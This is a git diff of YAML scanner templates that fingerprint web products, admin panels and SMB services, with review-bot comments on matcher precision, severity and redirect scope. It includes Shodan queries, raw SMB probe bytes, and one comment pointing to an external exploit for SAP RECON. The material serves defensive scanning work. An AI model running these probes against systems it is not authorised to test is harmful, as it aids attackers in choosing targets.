type: word + part: body + words: + - "default" + - "my_id" + - "root_url" + condition: and + - type: status + status: + - 200 diff --git a/poc/detect/remkon-manager-detect.yaml b/poc/detect/remkon-manager-detect.yaml index 0f44dc49fe..3d74086597 100644 --- a/poc/detect/remkon-manager-detect.yaml +++ b/poc/detect/remkon-manager-detect.yaml 
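Review bot: The new `redmine-cli-detect-9854.yaml` template reports a readable `/.redmine-cli` file as `severity: info` with `tags: tech,redmine`, which files it among technology fingerprints. A served dotfile containing `root_url` and `my_id` is a client configuration exposure, and such files commonly hold an API key as well (not visible in this hunk, so confirm against a sample file). I would tag it `exposure,config` and reconsider the severity, so the finding is not filtered out with fingerprint noise during triage.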
@@ -1,18 +1,22 @@ id: remkon-manager-detect + info: name: Remkon Device Manager Detect author: pikpikcu severity: info tags: remkon,tech,panel + requests: - method: GET path: - '{{BaseURL}}/login.php' + matchers-condition: and matchers: - type: status status: - 200 + - type: word part: body words: diff --git a/poc/detect/rhymix-cms-detect-9877.yaml b/poc/detect/rhymix-cms-detect-9877.yaml index c62f8f086a..770132eacb 100644 --- a/poc/detect/rhymix-cms-detect-9877.yaml +++ b/poc/detect/rhymix-cms-detect-9877.yaml @@ -1,22 +1,31 @@ id: rhymix-cms-detect + info: name: Rhymix CMS Detect author: gy741 severity: info description: Detects Rhymix CMS + reference: + - https://github.com/rhymix/rhymix + metadata: + max-request: 1 tags: tech,rhymix - reference: https://github.com/rhymix/rhymix -requests: + +http: - method: GET path: - "{{BaseURL}}" + matchers-condition: or matchers: - type: word part: header words: - 'rx_sesskey1' + - type: word part: body words: - '' + +# digest: 490a0046304402207ac43247eda3384fc8a8331614a20db3e489480b9fe2278895b5e60f4ecb9ba902207f8d4071cb25a417b80033d3e4d1ef48971621c76578fc1c3469b561093aa8c8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/rhymix-cms-detect-9878.yaml b/poc/detect/rhymix-cms-detect-9878.yaml new file mode 100644 index 0000000000..c62f8f086a --- /dev/null +++ b/poc/detect/rhymix-cms-detect-9878.yaml @@ -0,0 +1,22 @@ +id: rhymix-cms-detect +info: + name: Rhymix CMS Detect + author: gy741 + severity: info + description: Detects Rhymix CMS + tags: tech,rhymix + reference: https://github.com/rhymix/rhymix +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: or + matchers: + - type: word + part: header + words: + - 'rx_sesskey1' + - type: word + part: body + words: + - '' diff --git a/poc/detect/rseenet-detect-9916.yaml b/poc/detect/rseenet-detect-9916.yaml deleted file mode 100644 index 4a788c516d..0000000000 --- a/poc/detect/rseenet-detect-9916.yaml +++ /dev/null 
@@ -1,31 +0,0 @@ -id: rseenet-detect - -info: - name: Advantech R-SeeNet Detection - author: pdteam - severity: info - reference: - - https://icr.advantech.cz/products/software/r-seenet - metadata: - max-request: 1 - shodan-query: http.title:"R-SeeNet" - tags: tech,rseenet - -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: regex - part: body - regex: - - 'R-SeeNet (.*)' - - extractors: - - type: regex - group: 1 - regex: - - 'R-SeeNet (.*)' - -# digest: 4a0a00473045022046b9f1935cc337f010d6a348323d13f3848bf5ef9dfc81a1ebf3a37a77f6ace5022100d44a0bce5f1020e203f233e9822ed6c6107ae109b96326e91832fc6d358000e6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/rseenet-detect.yaml b/poc/detect/rseenet-detect.yaml new file mode 100644 index 0000000000..a18280dc21 --- /dev/null +++ b/poc/detect/rseenet-detect.yaml @@ -0,0 +1,23 @@ +id: rseenet-detect +info: + name: Advantech R-SeeNet Detection + author: pdteam + severity: info + reference: https://icr.advantech.cz/products/software/r-seenet + metadata: + shodan-query: http.title:"R-SeeNet" + tags: tech,rseenet +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: regex + part: body + regex: + - 'R-SeeNet (.*)' + extractors: + - type: regex + group: 1 + regex: + - 'R-SeeNet (.*)' diff --git a/poc/detect/rstudio-detect-9917.yaml b/poc/detect/rstudio-detect-9917.yaml deleted file mode 100644 index 9d2d071c9c..0000000000 --- a/poc/detect/rstudio-detect-9917.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: rstudio-detect -info: - name: RStudio panel detector - author: philippedelteil - severity: info - tags: panel,rstudio -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - words: - - 'RStudio' - part: header - - type: status - status: - - 302 diff --git a/poc/detect/rstudio-detect-9919.yaml b/poc/detect/rstudio-detect-9919.yaml new file mode 100644 index 0000000000..d5e3bef4f2 --- /dev/null +++ b/poc/detect/rstudio-detect-9919.yaml 
@@ -0,0 +1,21 @@ +id: rstudio-detect + +info: + name: RStudio panel detector + author: philippedelteil + severity: info + tags: panel,rstudio + +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + words: + - 'RStudio' + part: header + - type: status + status: + - 302 diff --git a/poc/detect/rstudio-detect.yaml b/poc/detect/rstudio-detect.yaml index d5e3bef4f2..9d2d071c9c 100644 --- a/poc/detect/rstudio-detect.yaml +++ b/poc/detect/rstudio-detect.yaml @@ -1,11 +1,9 @@ id: rstudio-detect - info: name: RStudio panel detector author: philippedelteil severity: info tags: panel,rstudio - requests: - method: GET path: diff --git a/poc/detect/s3-detect-9964.yaml b/poc/detect/s3-detect-9964.yaml index 7868591be0..a7fdcd87d1 100644 --- a/poc/detect/s3-detect-9964.yaml +++ b/poc/detect/s3-detect-9964.yaml @@ -1,14 +1,29 @@ id: s3-detect + info: name: Detect Amazon-S3 Bucket author: melbadry9 severity: info -requests: + metadata: + max-request: 1 + tags: aws,s3,bucket,tech + +http: - method: GET path: - "{{BaseURL}}/%c0" + + matchers-condition: or matchers: - type: regex + part: body regex: - "(?:InvalidURI|InvalidArgument|NoSuchBucket)" - part: body + + - type: dsl + dsl: + - 'contains(to_lower(server), "amazons3")' + - 'contains(to_lower(header), "x-amz-id")' + - 'contains(to_lower(header), "x-amz-request-id")' + +# digest: 4b0a00483046022100e4d62de5d67e017609c9e06ca9dcc8a840a222db5d65cb83201b7d13bb84dfa4022100efc723578b13403d1c4216dfc6add252cd5c7423d8e64045293962a21497a063:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/samba-detect-9988.yaml b/poc/detect/samba-detect-9988.yaml index 1bd21fd9d7..68f0879828 100644 --- a/poc/detect/samba-detect-9988.yaml +++ b/poc/detect/samba-detect-9988.yaml 
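Review bot: In `s3-detect-9964.yaml` the new `dsl` matcher sits under `matchers-condition: or` and has no `condition` of its own, so a single `x-amz-request-id` or `x-amz-id` header is enough to report "Detect Amazon-S3 Bucket". S3-compatible object stores return those headers as well, so the finding would name the wrong product, and it says nothing about whether a bucket exists. Requiring the server banner together with the header narrows this: add `condition: and` under the `dsl:` list, or keep only `contains(to_lower(server), "amazons3")` there. The trade-off, that a front end stripping `Server` is then missed by this matcher and left to the body regex, belongs in a comment on the matcher.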
@@ -1,16 +1,18 @@ id: samba-detection info: name: Samba Detection + description: Samba is a free and open-source software that allows files to be shared across Windows and Linux systems simply and easily. + remediation: Always apply the latest security patch. author: pussycat0x severity: info - description: Samba is a free and open-source software that allows files to be shared across Windows and Linux systems simply and easily. + tags: network,smb,samba reference: - https://www.samba.org/samba/what_is_samba.html - https://www.samba.org/samba/history/security.html classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 cwe-id: CWE-200 - remediation: Always apply the latest security patch. - tags: network,smb,samba network: - inputs: - data: 000000a4ff534d4272000000000801400000000000000000000000000000400600000100008100025043204e4554574f524b2050524f4752414d20312e3000024d4943524f534f4654204e4554574f524b5320312e303300024d4943524f534f4654204e4554574f524b5320332e3000024c414e4d414e312e3000024c4d312e3258303032000253616d626100024e54204c414e4d414e20312e3000024e54204c4d20302e313200 diff --git a/poc/detect/samsung-printer-detect.yaml b/poc/detect/samsung-printer-detect.yaml index e203a00e6e..883f060872 100644 --- a/poc/detect/samsung-printer-detect.yaml +++ b/poc/detect/samsung-printer-detect.yaml 
@@ -1,32 +1,20 @@ id: samsung-printer-detect - info: - name: Samsung Printer Panel - Detect + name: SAMSUNG Printer Detection author: pussycat0x severity: info - description: Samsung printer panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - fofa-query: app="SAMSUNG-Printer" tags: iot,panel,samsung,printer - -http: + metadata: + fofa-query: 'app="SAMSUNG-Printer"' +requests: - method: GET path: - "{{BaseURL}}/sws/index.html" - matchers-condition: and matchers: - type: word words: - - 'SyncThru Web Service' - + - ' SyncThru Web Service ' - type: status status: - 200 - -# digest: 4a0a0047304502206e15842b403d0c1a0df47a437ec6d65681e28b920c967545d00eacce8be0f48c022100e83c41891a01c670daf11ec2d6fc5443570508d5abcb94d589874676937f826d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/sap-netweaver-detect-10042.yaml b/poc/detect/sap-netweaver-detect-10042.yaml index edbd2eaef5..631dd2667f 100644 --- a/poc/detect/sap-netweaver-detect-10042.yaml +++ b/poc/detect/sap-netweaver-detect-10042.yaml @@ -1,26 +1,13 @@ id: sap-netweaver-detect info: - name: SAP NetWeaver ICM Detection - author: randomstr1ng + name: SAP NetWeaver Detect + author: rakeshmane10 severity: info - description: Detection of SAP NetWeaver ABAP Webserver (ICM/ICF) - tags: sap,webserver requests: - method: GET path: - - "{{BaseURL}}" - redirects: true - max-redirects: 2 + - '{{BaseURL}}/irj/portal' matchers: - - type: regex - part: header - regex: - - "sap-server:" - - "Sap-Server:" - - "SAP NetWeaver Application Server" - condition: or - extractors: - - type: kval - part: header - kval: - - "server" + - type: word + words: + - NetWeaver diff --git a/poc/detect/sap-netweaver-detect-10047.yaml b/poc/detect/sap-netweaver-detect-10047.yaml deleted file mode 100644 index 9fe826a6f5..0000000000 --- a/poc/detect/sap-netweaver-detect-10047.yaml +++ /dev/null 
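Review bot: The new matcher in `sap-netweaver-detect-10042.yaml` is a single `word` entry, `NetWeaver`, with no `part` and no second matcher, so any response to `/irj/portal` that mentions the product name counts as a detection. That includes an error page or a proxy notice that merely names it. The header check on `sap-server:` and the `kval` extractor for `server` are removed, so the result no longer carries the banner either. State the intent with `part: body` and match a string specific to the portal page rather than the bare product name, or keep the header regex from the removed side as a second matcher. The template also loses `description` and `tags`, which leaves it unselectable by tag.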
@@ -1,30 +0,0 @@ -id: sap-netweaver-detect - -info: - name: SAP NetWeaver ICM Detection - author: randomstr1ng - description: Detection of SAP NetWeaver ABAP Webserver (ICM/ICF) - severity: info - tags: sap,webserver - -requests: - - method: GET - path: - - "{{BaseURL}}" - - redirects: true - max-redirects: 2 - matchers: - - type: regex - part: header - regex: - - "sap-server:" - - "Sap-Server:" - - "SAP NetWeaver Application Server" - condition: or - - extractors: - - type: kval - part: header - kval: - - "server" diff --git a/poc/detect/sap-recon-detect-10063.yaml b/poc/detect/sap-recon-detect-10063.yaml deleted file mode 100644 index 738d048d1f..0000000000 --- a/poc/detect/sap-recon-detect-10063.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: sap-recon-detect -info: - name: SAP RECON Finder - author: samueladi_ & organiccrap - severity: medium - tags: panel - # Source:- https://github.com/chipik/SAP_RECON - # This is detection template, please use above poc to exploit this further. -requests: - - method: GET - path: - - "{{BaseURL}}/CTCWebService/CTCWebServiceBean" - - "{{BaseURL}}/CTCWebService/CTCWebServiceBean?wsdl" - - "{{BaseURL}}/CTCWebService/Config1?wsdl" - matchers-condition: and - matchers: - - type: word - words: - - Method Not Allowed - - Expected request method POST. Found GET. - - Generated by WSDLDefinitionsParser - - bns0:Config1Binding - - wsdl:definitions - - tns:CTCWebServiceSiBinding - condition: or - - type: status - status: - - 405 - - 200 - condition: or diff --git a/poc/detect/sceditor-detect-10093.yaml b/poc/detect/sceditor-detect-10093.yaml new file mode 100644 index 0000000000..ac205e1bbe --- /dev/null +++ b/poc/detect/sceditor-detect-10093.yaml 
@@ -0,0 +1,20 @@ +id: sceditor-detect +info: + name: SCEditor Detect + author: pikpikcu + severity: info + tags: tech,sceditor +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + words: + - "Ticket BBCode editor - SCEditor" + - 'title="SCEditor"' + condition: and + - type: status + status: + - 200 diff --git a/poc/detect/sceditor-detect-10094.yaml b/poc/detect/sceditor-detect-10094.yaml index d9b323edea..9a760f928e 100644 --- a/poc/detect/sceditor-detect-10094.yaml +++ b/poc/detect/sceditor-detect-10094.yaml @@ -4,9 +4,11 @@ info: name: SCEditor Detect author: pikpikcu severity: info + metadata: + max-request: 1 tags: tech,sceditor -requests: +http: - method: GET path: - "{{BaseURL}}" @@ -18,6 +20,9 @@ requests: - "Ticket BBCode editor - SCEditor" - 'title="SCEditor"' condition: and + - type: status status: - 200 + +# digest: 4a0a00473045022100969eefbde652164896fc0176c36b131fc2cc6f043c9a6dec6251de74293a8309022039d2438182d8e67409001db114578f7b75891f61dbf5d3a6a5c71d84c8a080e0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/secmail-detect-10109.yaml b/poc/detect/secmail-detect-10109.yaml new file mode 100644 index 0000000000..71b8405b65 --- /dev/null +++ b/poc/detect/secmail-detect-10109.yaml @@ -0,0 +1,20 @@ +id: secmail-detect +info: + name: SecMail - secure email Detect + author: johnk3r + severity: info + reference: https://www.shodan.io/search?query=secmail + tags: secmail,panel +requests: + - method: GET + path: + - "{{BaseURL}}/SecMail/login.jsp" + matchers-condition: and + matchers: + - type: word + words: + - "Path=/SecMail" + part: header + - type: status + status: + - 200 diff --git a/poc/detect/secmail-detect-10112.yaml b/poc/detect/secmail-detect-10112.yaml deleted file mode 100644 index 1d505852be..0000000000 --- a/poc/detect/secmail-detect-10112.yaml +++ /dev/null 
@@ -1,21 +0,0 @@ -id: secmail-detect -info: - name: SecMail - secure email Detect - author: johnk3r - severity: info - metadata: - shodan-query: secmail - tags: secmail,panel -requests: - - method: GET - path: - - "{{BaseURL}}/SecMail/login.jsp" - matchers-condition: and - matchers: - - type: word - words: - - "Path=/SecMail" - part: header - - type: status - status: - - 200 diff --git a/poc/detect/securityspy-detect.yaml b/poc/detect/securityspy-detect.yaml index 9200b97b41..76a69cbbc1 100644 --- a/poc/detect/securityspy-detect.yaml +++ b/poc/detect/securityspy-detect.yaml @@ -1,20 +1,14 @@ id: securityspy-detect info: - name: SecuritySpy Camera Panel - Detect + name: SecuritySpy Camera Detect author: pussycat0x - severity: info - description: SecuritySpy Camera panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 + severity: medium metadata: - max-request: 1 - shodan-query: 'title:SecuritySpy' + shodan-dork: 'title:SecuritySpy' tags: unauth,iot,securityspy,panel,camera -http: +requests: - method: GET path: - "{{BaseURL}}" @@ -29,5 +23,3 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022002bd0d27112c5583a1a1e79cb069d61a4a8b5a463ad9a4b3ee26f7023f5cd083022100bdd3b9e86e7f48c1d0605634b208214a6204d9d4da98679ad5b0aaae1f2ffbea:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/seeddms-detect-10129.yaml b/poc/detect/seeddms-detect-10129.yaml index 1c313a8fde..8fe2e10923 100644 --- a/poc/detect/seeddms-detect-10129.yaml +++ b/poc/detect/seeddms-detect-10129.yaml 
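Review bot: `securityspy-detect.yaml` now reports `severity: medium` with no `description` or `classification`, where the removed side described a panel detection at `info` with a CVSS score of 0. The matchers lie mostly outside this hunk (only the `status` check is visible), so whether they prove unauthenticated camera access or only fingerprint the page cannot be confirmed from here. If it is a fingerprint, use `severity: info`; if the `unauth` tag is the intent, keep `medium` and add a `description` saying what is exposed. The metadata key also changes to `shodan-dork`, while the other templates in this commit use `shodan-query`, so tooling that reads that key will skip this one.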
@@ -1,21 +1,21 @@ -id: seeddms-detect -info: - name: Seeddms- - author: pussycat0x - severity: info - tags: tech -requests: - - method: GET - path: - - "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php" - - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - words: - - "SeedDMS: Sign in" - - type: status - status: +id: seeddms-detect +info: + name: Seeddms- + author: pussycat0x + severity: info + tags: tech +requests: + - method: GET + path: + - "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + words: + - "SeedDMS: Sign in" + - type: status + status: - 200 \ No newline at end of file diff --git a/poc/detect/seeddms-detect-10131.yaml b/poc/detect/seeddms-detect-10131.yaml new file mode 100644 index 0000000000..1c313a8fde --- /dev/null +++ b/poc/detect/seeddms-detect-10131.yaml @@ -0,0 +1,21 @@ +id: seeddms-detect +info: + name: Seeddms- + author: pussycat0x + severity: info + tags: tech +requests: + - method: GET + path: + - "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + words: + - "SeedDMS: Sign in" + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/detect/server-backup-manager-se-login-detect.yaml b/poc/detect/server-backup-manager-se-login-detect.yaml index 94e05a332f..9e8e641acf 100644 --- a/poc/detect/server-backup-manager-se-login-detect.yaml +++ b/poc/detect/server-backup-manager-se-login-detect.yaml 
@@ -1,20 +1,33 @@ id: server-backup-manager-se + info: - name: Server Backup Manager SE + name: Server Backup Manager SE Panel - Detect author: dhiyaneshDK severity: info + description: Server Backup Manager SE login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: + max-request: 1 shodan-query: http.title:"Server Backup Manager SE" - tags: panel -requests: + tags: panel,server,backup,manager + +http: - method: GET path: - '{{BaseURL}}/login.zul' + matchers-condition: and matchers: - - type: word - words: - - 'Server Backup Manager SE ' + - type: regex + part: body + regex: + - ".*(Server Backup Manager SE).*" + - type: status status: - 200 + +# Enhanced by md on 2023/01/16 diff --git a/poc/detect/shiro-detect-10195.yaml b/poc/detect/shiro-detect-10195.yaml index 514835edd5..d1b92dd808 100644 --- a/poc/detect/shiro-detect-10195.yaml +++ b/poc/detect/shiro-detect-10195.yaml @@ -1,26 +1,19 @@ id: shiro-detect - info: name: Detect Shiro Framework author: AresX severity: info - metadata: - max-request: 1 tags: tech,shiro - -http: +requests: - method: GET path: - '{{BaseURL}}' - headers: Cookie: JSESSIONID={{randstr}};rememberMe=123; - host-redirects: true + redirects: true max-redirects: 2 matchers: - type: word part: header words: - "rememberMe=deleteMe" - -# digest: 4a0a00473045022100ef5b22652ce1d79a4b00ae2a53eee9f78b2c0042daa5c736c85a1add769cc14602203bfd13125a69cbb3928016a681afc1e1c6eee18343fda64679c693997c0e4860:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/shiro-detect-10196.yaml b/poc/detect/shiro-detect-10196.yaml deleted file mode 100644 index d1b92dd808..0000000000 --- a/poc/detect/shiro-detect-10196.yaml +++ /dev/null 
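Review bot: The regex `".*(Server Backup Manager SE).*"` added to `server-backup-manager-se-login-detect.yaml` matches exactly the bodies that contain the literal string. The leading and trailing `.*` and the capture group add scanning work and nothing else, and no extractor uses the group. A `word` matcher with `part: body` and `"Server Backup Manager SE"` says the same thing more plainly. If the aim was to tie the match to the page title, put the title markup in the pattern instead of wildcards. The file also ends with a free-text `# Enhanced by md on 2023/01/16` comment and no `# digest:` line.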
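Review bot: In `shiro-detect-10195.yaml` the new side replaces `host-redirects: true` with `redirects: true`, which lifts the same-host limit on the two permitted redirects. The probe can then follow a redirect to a host outside the scan scope, and a `rememberMe=deleteMe` header set by that other host would be reported against the original target. Keep `host-redirects: true` here; as far as I know the legacy `requests:` block accepts it as well. This hunk also drops `metadata.max-request` and the `# digest:` line.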
@@ -1,19 +0,0 @@ -id: shiro-detect -info: - name: Detect Shiro Framework - author: AresX - severity: info - tags: tech,shiro -requests: - - method: GET - path: - - '{{BaseURL}}' - headers: - Cookie: JSESSIONID={{randstr}};rememberMe=123; - redirects: true - max-redirects: 2 - matchers: - - type: word - part: header - words: - - "rememberMe=deleteMe" diff --git a/poc/detect/shopware-detect-10211.yaml b/poc/detect/shopware-detect-10211.yaml deleted file mode 100644 index 290d5bfe2c..0000000000 --- a/poc/detect/shopware-detect-10211.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: shopware-detect -info: - name: Shopware CMS detect - author: cyllective - severity: info - description: Detects Shopware CMS - tags: tech,shopware,cms - reference: - - https://github.com/shopware/shopware - - https://github.com/shopware/platform -requests: - - method: GET - path: - - "{{BaseURL}}/admin" - - "{{BaseURL}}/backend" - matchers: - - type: word - part: body - condition: or - words: - - 'Realisiert mit Shopware' - - 'Realised with Shopware' - - 'Shopware Administration (c) shopware AG' - - 'Shopware 5 - Backend (c) shopware AG' diff --git a/poc/detect/shopware-detect-10212.yaml b/poc/detect/shopware-detect-10212.yaml index 2765f4f1d3..edf59386b6 100644 --- a/poc/detect/shopware-detect-10212.yaml +++ b/poc/detect/shopware-detect-10212.yaml @@ -7,16 +7,12 @@ info: reference: - https://github.com/shopware/shopware - https://github.com/shopware/platform - metadata: - verified: true - shodan-query: title:"shopware AG" tags: tech,shopware,cms requests: - method: GET path: - "{{BaseURL}}/admin" - "{{BaseURL}}/backend" - stop-at-first-match: true matchers-condition: and matchers: - type: word diff --git a/poc/detect/sitemap-detect.yaml b/poc/detect/sitemap-detect.yaml index d7069a6c82..b14ed90663 100644 --- a/poc/detect/sitemap-detect.yaml +++ b/poc/detect/sitemap-detect.yaml 
@@ -2,17 +2,13 @@ id: sitemap-detect info: name: Sitemap Detection - author: houdinis + author: houdinis,Arqsz severity: info description: | A sitemap is a file where you provide information about the pages, videos, and other files on your site, and the relationships between them. - metadata: - verified: true - max-request: 3 - google-query: intext:"sitemap" filetype:txt,filetype:xml inurl:sitemap,inurl:"/sitemap.xsd" ext:xsd - tags: misc,generic,sitemap + tags: basic,remote,sitemap -http: +requests: - method: GET path: - "{{BaseURL}}/sitemap.xml" @@ -20,21 +16,22 @@ http: - "{{BaseURL}}/sitemap.xsd" stop-at-first-match: true - matchers-condition: and matchers: - type: word words: - - "sitemap>" + - "sitemap" + - "' + +# digest: 4a0a00473045022018a8bf80686d606487628b98a556864708b3e41d09ac2125c7b49dd65a7ce794022100f9709ab85ec5ebe2358b9f3bb10818003a36e06d2e1efcc8639d6f6b1c15df0d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/smartstore-detect.yaml b/poc/detect/smartstore-detect.yaml deleted file mode 100644 index 110fd55841..0000000000 --- a/poc/detect/smartstore-detect.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: smartstore-detect -info: - name: SmartStore Detect - author: princechaddha - severity: info - reference: https://github.com/smartstore/SmartStoreNET - metadata: - shodan-query: http.html:'content="Smartstore' - tags: tech,smartstore,oos -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - '' - - type: status - status: - - 200 - extractors: - - type: regex - part: body - group: 1 - regex: - - '' diff --git a/poc/detect/smb-v1-detection-10336.yaml b/poc/detect/smb-v1-detection-10336.yaml index 8326a7cd28..4ff32b9e36 100644 --- a/poc/detect/smb-v1-detection-10336.yaml +++ b/poc/detect/smb-v1-detection-10336.yaml 
@@ -3,9 +3,8 @@ info: name: SMB-V1 Detection author: pussycat0x severity: low - reference: - - https://stealthbits.com/blog/what-is-smbv1-and-why-you-should-disable-it/ tags: network,windows,smb,service + reference: https://stealthbits.com/blog/what-is-smbv1-and-why-you-should-disable-it/ network: - inputs: - data: 00000031ff534d4272000000001845680000000000000000000000000000be2200000100000e00024e54204c4d20302e3132000200 diff --git a/poc/detect/sonicwall-email-security-detect-10384.yaml b/poc/detect/sonicwall-email-security-detect-10384.yaml new file mode 100644 index 0000000000..5790aa18c4 --- /dev/null +++ b/poc/detect/sonicwall-email-security-detect-10384.yaml @@ -0,0 +1,29 @@ +id: sonicwall-email-security-detect + +info: + name: SonicWall Email Security Panel - Detect + author: gy741 + severity: info + description: SonicWall Email Security panel was detected. + reference: + - https://www.fireeye.com/blog/threat-research/2021/04/zero-day-exploits-in-sonicwall-email-security-lead-to-compromise.html + - https://www.sonicwall.com/support/product-notification/security-notice-sonicwall-email-security-zero-day-vulnerabilities/210416112932360/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: tech,panel,sonicwall + +http: + - method: GET + path: + - "{{BaseURL}}/favicon.ico" + + matchers: + - type: dsl + dsl: + - "status_code==200 && (\"2063459123\" == mmh3(base64_py(body)))" + +# digest: 4a0a00473045022100dba93d5edbb4ab30b06e1212e304da9967fe39c322123435e5182abcb2ff93b1022050315db689600caa91fb1b2a4f1c8bd8ebf7cb9638965898fc7280cfdc3dbaeb:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/sonicwall-email-security-detect.yaml b/poc/detect/sonicwall-email-security-detect.yaml deleted file mode 100644 index 13bef24f4c..0000000000 --- a/poc/detect/sonicwall-email-security-detect.yaml +++ /dev/null 
@@ -1,17 +0,0 @@ -id: sonicwall-email-security-detect -info: - name: SonicWall Email Security Detection - author: gy741 - severity: info - reference: - - https://www.fireeye.com/blog/threat-research/2021/04/zero-day-exploits-in-sonicwall-email-security-lead-to-compromise.html - - https://www.sonicwall.com/support/product-notification/security-notice-sonicwall-email-security-zero-day-vulnerabilities/210416112932360/ - tags: tech,panel,sonicwall -requests: - - method: GET - path: - - "{{BaseURL}}/favicon.ico" - matchers: - - type: dsl - dsl: - - "status_code==200 && (\"2063459123\" == mmh3(base64_py(body)))" diff --git a/poc/detect/sophos-fw-version-detect-10397.yaml b/poc/detect/sophos-fw-version-detect-10397.yaml index 0b3fc4beb8..a57a47289f 100644 --- a/poc/detect/sophos-fw-version-detect-10397.yaml +++ b/poc/detect/sophos-fw-version-detect-10397.yaml 
@@ -1,25 +1,46 @@ id: sophos-fw-version-detect + info: - name: Sophos Firewall version detection - author: organiccrap + name: Sophos Firewall Login Panel - Detect + author: organiccrap,daffainfo severity: info + description: Sophos Firewall login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + verified: true + max-request: 2 + shodan-query: title:"Sophos" tags: panel,sophos -requests: + +http: - method: GET path: - "{{BaseURL}}/webconsole/webpages/login.jsp" - "{{BaseURL}}/userportal/webpages/myaccount/login.jsp" + + stop-at-first-match: true + matchers-condition: and matchers: - type: word - words: - - "Sophos" - - type: regex part: body - regex: - - "(\\d{2}.\\d{1,2}.\\d{1,2}.\\d{2,3})" + words: + - 'Sophos' + - 'uiLangToHTMLLangAttributeValueMapping' + condition: or + + - type: status + status: + - 200 + extractors: - type: regex part: body + group: 1 regex: - - "(\\d{2}.\\d{1,2}.\\d{1,2}.\\d{2,3})" + - 'href="\/themes\/lite1\/css\/typography\.css\?version=(([0-9a-z]+)([0-9.]+))' + +# digest: 4a0a00473045022100e719d9d4d187dc31a3205e9addb367e73ea88ae41ba719077c485ab4e8f9d2e102200a2eed57a3a87143354e14cc39d437a0008498f9d734eea5dcfddbe0c8a39143:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/tableau-server-detect-10643.yaml b/poc/detect/tableau-server-detect-10643.yaml new file mode 100644 index 0000000000..0cab5d3164 --- /dev/null +++ b/poc/detect/tableau-server-detect-10643.yaml 
@@ -0,0 +1,40 @@ +id: tableau-server-detect + +info: + name: Detect Tableau Server + author: TechbrunchFR,aringo + severity: info + description: Detects Tableau Server and extracts the buildid + metadata: + max-request: 1 + tags: tech,tableau + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: or + matchers: + - type: word + part: header + words: + - "X-Tableau: Tableau Server" + - "Server: Tableau" + condition: or + + - type: word + part: body + words: + - "VizPortalRun" + - "vizportal" + condition: or + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'data-build[iI]d="([0-9a-z_]*)' + +# digest: 4a0a00473045022071d557c42ef5b1358fad1342b2a62f8ee6881da2e625cda380610cb0ac5f055e022100842c5e161be3403a54151269cd89e1e9de9c186f5c17e6e4f6e9170159039b1c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/tableau-server-detect.yaml b/poc/detect/tableau-server-detect.yaml deleted file mode 100644 index ac33cb0bcb..0000000000 --- a/poc/detect/tableau-server-detect.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: tableau-server-detect -info: - name: Detect Tableau Server - author: TechbrunchFR - description: Detects Tableau Server and extract the buildId - severity: info - tags: tech,tableau -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: or - matchers: - - type: word - part: header - words: - - "X-Tableau: Tableau Server" - - "Server: Tableau" - condition: or - - type: word - part: body - words: - - "VizPortalRun" - - "vizportal" - condition: or - extractors: - - type: regex - part: body - group: 1 - regex: - - 'data-buildId="([0-9a-z_]*)' diff --git a/poc/detect/tech-detect-10672.yaml b/poc/detect/tech-detect-10672.yaml new file mode 100644 index 0000000000..0f825bbc34 --- /dev/null +++ b/poc/detect/tech-detect-10672.yaml 
